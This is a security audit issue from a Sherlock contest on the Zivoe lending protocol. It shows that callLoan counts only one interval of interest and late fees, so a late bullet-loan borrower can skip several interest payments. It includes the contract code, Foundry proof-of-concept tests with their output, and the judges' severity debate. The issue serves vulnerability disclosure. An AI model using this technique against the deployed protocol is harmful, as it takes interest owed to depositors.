sherlock-audit / 2024-03-zivoe-judging

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y4y - When APR late rate is lower than APR, an OCC locker bullet loan borrower can pay way less interests by calling the loan #97

Open sherlock-admin2 opened 6 months ago

sherlock-admin2 commented 6 months ago



When APR late rate is lower than APR, an OCC locker bullet loan borrower can pay way less interests by calling the loan


A bullet loan borrower can pay less interests by calling callLoan at the end of payment period.

Vulnerability Detail

In OCC_Modular contract, the protocol can create loan offers, and users can accept them. The loan has two types, one being bullet, and the other being amortization. In the bullet loan, borrowers only need to pay back interests for each interval, and principle at the last term.

amountOwed returns the payment amount needed for each loan id:

    function amountOwed(uint256 id) public view returns (
        uint256 principal, uint256 interest, uint256 lateFee, uint256 total
    ) {
        // 0 == Bullet.
        if (loans[id].paymentSchedule == 0) {
            if (loans[id].paymentsRemaining == 1) { principal = loans[id].principalOwed; }
        // 1 == Amortization (only two options, use else here).
        else { principal = loans[id].principalOwed / loans[id].paymentsRemaining; }

        // Add late fee if past loans[id].paymentDueBy.
        if (block.timestamp > loans[id].paymentDueBy && loans[id].state == LoanState.Active) {
            lateFee = loans[id].principalOwed * (block.timestamp - loans[id].paymentDueBy) *
                loans[id].APRLateFee / (86400 * 365 * BIPS);
        interest = loans[id].principalOwed * loans[id].paymentInterval * loans[id].APR / (86400 * 365 * BIPS);
        total = principal + interest + lateFee;

And we see, there is a lateFee for any loans which is overdue. The later the borrower pays back the loan, the more late fees will be accumulated. Plus, the under writer role can always set the loan to default when it's way passed grace period. callLoan provides an option for borrowers to payback all he/she owes immediately and settles the loan. In this function, amountOwed is called once:

    function callLoan(uint256 id) external nonReentrant {
            _msgSender() == loans[id].borrower || IZivoeGlobals_OCC(GBL).isLocker(_msgSender()), 
            "OCC_Modular::callLoan() _msgSender() != loans[id].borrower && !isLocker(_msgSender())"
        require(loans[id].state == LoanState.Active, "OCC_Modular::callLoan() loans[id].state != LoanState.Active");

        uint256 principalOwed = loans[id].principalOwed;
        (, uint256 interestOwed, uint256 lateFee,) = amountOwed(id);

        emit LoanCalled(id, principalOwed + interestOwed + lateFee, principalOwed, interestOwed, lateFee);

        // Transfer interest to YDL if in same format, otherwise keep here for 1INCH forwarding.
        if (stablecoin == IZivoeYDL_OCC(IZivoeGlobals_OCC(GBL).YDL()).distributedAsset()) {
            IERC20(stablecoin).safeTransferFrom(_msgSender(), IZivoeGlobals_OCC(GBL).YDL(), interestOwed + lateFee);
        else {
            IERC20(stablecoin).safeTransferFrom(_msgSender(), OCT_YDL, interestOwed + lateFee);

        IERC20(stablecoin).safeTransferFrom(_msgSender(), owner(), principalOwed);

        loans[id].principalOwed = 0;
        loans[id].paymentDueBy = 0;
        loans[id].paymentsRemaining = 0;
        loans[id].state = LoanState.Repaid;

This means, only one interval's late fee is taken into account for this calculation. When the late fee rate is less than APR, and the payment is way overdue, it's possible for such borrower to skip a few interests and late fee payment.

    function test_OCC_Late_Payment_Loan_ALL() public {
        uint256 borrowAmount = 20 * 10 ** 18;
        uint256 APR;
        uint256 APRLateFee;
        uint256 term;
        uint256 paymentInterval;
        uint256 gracePeriod;
        int8 paymentSchedule = 0;

        APR = 1000;
        APRLateFee = 500;
        term = 10;
        paymentInterval = options[1];
        gracePeriod = uint256(10 days) % 90 days + 7 days;
        mint("DAI", address(tim), 100 * 10 **18);
            address(tim), borrowAmount, APR, APRLateFee, term, paymentInterval, gracePeriod, paymentSchedule

        uint256 loanId = OCC_Modular_DAI.loanCounter() - 1;

        IERC20(DAI).approve(address(OCC_Modular_DAI), type(uint256).max);
        (, , uint256[10] memory info) = OCC_Modular_DAI.loanInfo(loanId);
        hevm.warp(info[3] + (info[4] * term));
        uint256 balanceBefore = IERC20(DAI).balanceOf(address(tim));
        while (info[4] > 0) {
            (, , info) = OCC_Modular_DAI.loanInfo(loanId);
        uint256 balanceAfter = IERC20(DAI).balanceOf(address(tim));
        uint256 diff = balanceBefore - balanceAfter;
        console.log("paid total when payments are late for each interval:", diff);
        console.log("total interests:", diff - borrowAmount);

    function test_OCC_Normal_Payment_Loan() public {
        uint256 borrowAmount = 20 * 10 ** 18;
        uint256 APR;
        uint256 APRLateFee;
        uint256 term;
        uint256 paymentInterval;
        uint256 gracePeriod;
        int8 paymentSchedule = 0;

        APR = 1000;
        APRLateFee = 500;
        term = 10;
        paymentInterval = options[1];
        gracePeriod = uint256(10 days) % 90 days + 7 days;
        mint("DAI", address(tim), 100 * 10 ** 18);
            address(tim), borrowAmount, APR, APRLateFee, term, paymentInterval, gracePeriod, paymentSchedule

        uint256 loanId = OCC_Modular_DAI.loanCounter() - 1;

        IERC20(DAI).approve(address(OCC_Modular_DAI), type(uint256).max);
        (, , uint256[10] memory info) = OCC_Modular_DAI.loanInfo(loanId);
        uint256 balanceBefore = IERC20(DAI).balanceOf(address(tim));
        while (info[4] > 0) {
            (, , info) = OCC_Modular_DAI.loanInfo(loanId);
        uint256 balanceAfter = IERC20(DAI).balanceOf(address(tim));
        uint256 diff = balanceBefore - balanceAfter;
        console.log("paid total when loan is solved normally:", diff);
        console.log("total interests:", diff - borrowAmount);

    function test_OCC_Late_Call_Loan() public {
        uint256 borrowAmount = 20 * 10 ** 18;
        uint256 APR;
        uint256 APRLateFee;
        uint256 term;
        uint256 paymentInterval;
        uint256 gracePeriod;
        int8 paymentSchedule = 0;

        APR = 1000;
        APRLateFee = 500;
        term = 10;
        paymentInterval = options[1];
        gracePeriod = uint256(10 days) % 90 days + 7 days;
        mint("DAI", address(tim), 100 * 10 ** 18);
            address(tim), borrowAmount, APR, APRLateFee, term, paymentInterval, gracePeriod, paymentSchedule

        uint256 loanId = OCC_Modular_DAI.loanCounter() - 1;

        IERC20(DAI).approve(address(OCC_Modular_DAI), type(uint256).max);
        (, , uint256[10] memory info) = OCC_Modular_DAI.loanInfo(loanId);
        hevm.warp(info[3] + (info[4] * term));
        uint256 balanceBefore = IERC20(DAI).balanceOf(address(tim));
        uint256 balanceAfter = IERC20(DAI).balanceOf(address(tim));
        uint256 diff = balanceBefore - balanceAfter;
        console.log("paid total when use `callLoan` at the end:", diff);
        console.log("total interests:", diff - borrowAmount);

In the above test cases, all three of them will have the same borrower, and borrow the same loan, with same details and everything. One of them simulating when a borrower pays all charges normally till the end of term, another one waits till the very end to pay back the loan with late fees, and the last one also wait till the end, except calls callLoan to settle the loan instead of normally paying back each interval's amount.

After running the test cases, the following will be logged:

[PASS] test_OCC_Late_Call_Loan() (gas: 373730) 
  paid total when use `callLoan` at the end: 20076715499746321663
  total interests: 76715499746321663       

[PASS] test_OCC_Late_Payment_Loan_ALL() (gas: 565561)  
  paid total when payments are late for each interval: 20767126458650431246
  total interests: 767126458650431246  

[PASS] test_OCC_Normal_Payment_Loan() (gas: 569173)
paid total when loan is solved normally: 20767123287671232870
total interests: 767123287671232870

As we can see, while callLoan also needs to pay the late fee penalty, it still charges way less than normally paying back the loan. This makes a borrower being able to skip a few interests fee, with the cost of little late fees.


The PoC provided above is certainly an exaggerated edge case, but it's also possible when late fees are aribitrary, as long as the loan is not set to default by under writers, the borrower can skip paying quite some interest fees by exploiting this at the cost of a few late fees. This is more likely to happen when intervals are set to 7 days, as the minimum grace period is 7 days.

Code Snippet

    function callLoan(uint256 id) external nonReentrant {
            _msgSender() == loans[id].borrower || IZivoeGlobals_OCC(GBL).isLocker(_msgSender()), 
            "OCC_Modular::callLoan() _msgSender() != loans[id].borrower && !isLocker(_msgSender())"
        require(loans[id].state == LoanState.Active, "OCC_Modular::callLoan() loans[id].state != LoanState.Active");

        uint256 principalOwed = loans[id].principalOwed;
        (, uint256 interestOwed, uint256 lateFee,) = amountOwed(id);

        emit LoanCalled(id, principalOwed + interestOwed + lateFee, principalOwed, interestOwed, lateFee);

        // Transfer interest to YDL if in same format, otherwise keep here for 1INCH forwarding.
        if (stablecoin == IZivoeYDL_OCC(IZivoeGlobals_OCC(GBL).YDL()).distributedAsset()) {
            IERC20(stablecoin).safeTransferFrom(_msgSender(), IZivoeGlobals_OCC(GBL).YDL(), interestOwed + lateFee);
        else {
            IERC20(stablecoin).safeTransferFrom(_msgSender(), OCT_YDL, interestOwed + lateFee);

        IERC20(stablecoin).safeTransferFrom(_msgSender(), owner(), principalOwed);

        loans[id].principalOwed = 0;
        loans[id].paymentDueBy = 0;
        loans[id].paymentsRemaining = 0;
        loans[id].state = LoanState.Repaid;

Tool used

Manual Review, foundry


Prohibits bullet loan borrowers from calling callLoan when the loan is late and still has more than 1 intervals to finish.

sherlock-admin3 commented 6 months ago

1 comment(s) were left on this issue during the judging contest.

panprog commented:

medium, if there are more than 1 interest payments missed by borrower, then callLoan takes only 1 period payment, allowing borrower to skip paying the other periods interest and lateFee payments.

pseudonaut commented 5 months ago

This is not a valid issue - calling a loan is much different than making a payment as it requires the full amount of principal vs. (in the case of bullet loans) a single payment with interest only

panprog commented 5 months ago

Yes, it's much different from making a payment, but it still allows to bypass paying additional interests/late fees, for example, when only a few payment periods are remaining and it makes sense to simply callLoan instead of doing last 2-3 interest and latefee payments at the expense of protocol / depositors.

Keeping this as medium.

panprog commented 5 months ago

Sponsor response:

intended functionality, user has option to callLoan at any point in time, and if you're saying they have late-fee's than theoretically the loan could be defaulted and likely would at that point preventing callLoan

panprog commented 5 months ago

This is from docs:

In some cases, the grace period may be longer than the payment interval, and the borrower may miss several loan payments before a loan enters default. In such an event, the borrower must resolve each missed payment before late fees stop accruing.

So it's possible that grace period is longer than payment interval. Example: payment interval = 7 days, grace period = 28 days. Borrower can simply stop paying 28 days before the loan is due. At the end of the loan he will have 4 missed payments, at which point he simply callLoan and pay only 1 missed payment + late fees from it, skipping paying the other 3 missed payments and late fees from them. Depending on late fees this can be cheaper for borrower than paying all 4 payments on time. Scenario A (paying on time): 28 days APR payments Scenario B (calling loan in the end): 7 days APR + 28 days * lateFee APR

If lateFee is less than APR, then borrower is better off skipping the last 4 payments and doing callLoan in the end.

Keeping this medium.